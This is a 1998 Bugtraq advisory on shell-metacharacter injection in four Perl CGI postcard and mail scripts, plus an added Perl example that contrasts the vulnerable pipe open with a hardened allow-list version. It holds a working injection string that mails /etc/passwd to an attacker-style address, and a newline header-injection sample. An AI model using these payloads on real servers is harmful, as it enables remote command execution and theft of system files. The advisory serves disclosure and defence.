Date: Mon, 9 Nov 1998 18:26:05 -0600
From: xnec <xnec@WINTERMUTE.LINUX.TC>
Subject: Several new CGI vulnerabilities
To: BUGTRAQ@NETSPACE.ORG

INFO:

After looking over the perl-CGI scripts on www.cgi-resources.com, I've
discovered vulnerabilities in the following:

1. HAMcards Postcard script v1.0 Beta 2 (www.hamnetcenter.com)
2. Hot Postal Services v?? (www.hotarea.com)
   note: the only metacharacter stripping this script does is rejecting
   any |'s
3. RC Bowen's Postcards v?? (www.rcbowen.com)
4. LakeWeb's File Mail and Mail List (expanded File Mail) v??
   (www.lakeweb.com)

EXPLOIT:

Each of these is exploitable by inputting shell metacharacters into the
recipient's email address. Each script calls something similar to:

    open( MAIL, "|$mailprog $email" )   # this particular line is from the LakeWeb scripts

Because the pipe open is given a single command string, Perl hands it to
/bin/sh, which interprets the metacharacters. The exploit strings are
simple; something like

    &mail evil@foobar.com < /etc/passwd&@host.com

will work for each script (the @host.com is necessary because some hosts
check for "@" and ".") when placed in the Recipient Email field. As a
result, any command can be executed remotely, without a local account,
with the uid of the webserver (usually "nobody" or similar, but you never
know).

FIX:

Either fork your sendmail process, strip out metacharacters (or only
allow certain characters), use open (MAIL , "|$sendmail -t"), or
rm -rf ./cgi-bin.

-xnec

######################################################
# xnec@wintermute.linux.tc - xnec on DALnet and EFnet#
######################################################
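Added example, not taken from xnec's post or from any of the scripts it
names: the vulnerable single-string pipe open beside a hardened version
that allow-lists the address and then uses the list form of open(), so no
shell is involved and sendmail reads the recipient from the headers via
-t. The sendmail path, the subroutine names, and the sample addresses are
assumptions made for the example.

```perl
#!/usr/bin/perl
# Added example (not from the original Bugtraq post). Assumed: sendmail
# lives at /usr/sbin/sendmail; the addresses below are constructed input.
use strict;
use warnings;

my $sendmail = '/usr/sbin/sendmail';   # assumed path

# 1. Vulnerable: a single-string pipe open is run through /bin/sh, so a
#    recipient such as "&mail evil@foobar.com < /etc/passwd&@host.com"
#    is executed as shell commands with the webserver's uid.
sub send_vulnerable {
    my ($to, $body) = @_;
    open(my $mail, "|$sendmail $to") or die "open: $!";
    print $mail "Subject: Postcard\n\n$body\n";
    close $mail;
}

# 2. Allow-list the recipient before it touches anything. \A and \z (not ^
#    and $) keep a trailing newline from slipping through, which also
#    blocks header injection when the address is later placed in To:.
sub valid_recipient {
    my ($addr) = @_;
    return $addr =~ /\A[A-Za-z0-9._%+-]+\@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+\z/
        ? 1 : 0;
}

# 3. Hardened: list-form open (Perl 5.8+) passes an argv directly to
#    sendmail with no shell in between; -t makes sendmail take the
#    recipient from the headers, and -i stops a lone "." ending the body.
sub send_hardened {
    my ($to, $body) = @_;
    die "rejected recipient\n" unless valid_recipient($to);
    open(my $mail, '|-', $sendmail, '-t', '-i') or die "open: $!";
    print $mail "To: $to\nSubject: Postcard\n\n$body\n";
    close $mail or die "sendmail exited with status ", $? >> 8, "\n";
}

# Demonstration on constructed input (nothing is sent).
my $attack = '&mail evil@foobar.com < /etc/passwd&@host.com';
for my $addr ('user@example.com', $attack,
              "user\@example.com\nBcc: x\@evil.example") {
    my $shown = $addr; $shown =~ s/\n/\\n/g;
    printf "%-50s %s\n", $shown,
        valid_recipient($addr) ? 'accepted' : 'rejected';
}
```

The post's "fork your sendmail process" fix is the same idea for Perls
older than 5.8, where the list form of open() does not exist:
open(MAIL, "|-") || exec($sendmail, '-t', '-i') forks and execs without a
shell. Note that "|$sendmail -t" on its own only removes the address from
the command line; if the address is then written into a To: header
unchecked, a value containing newlines can still add headers, so keep
the allow-list in place as well.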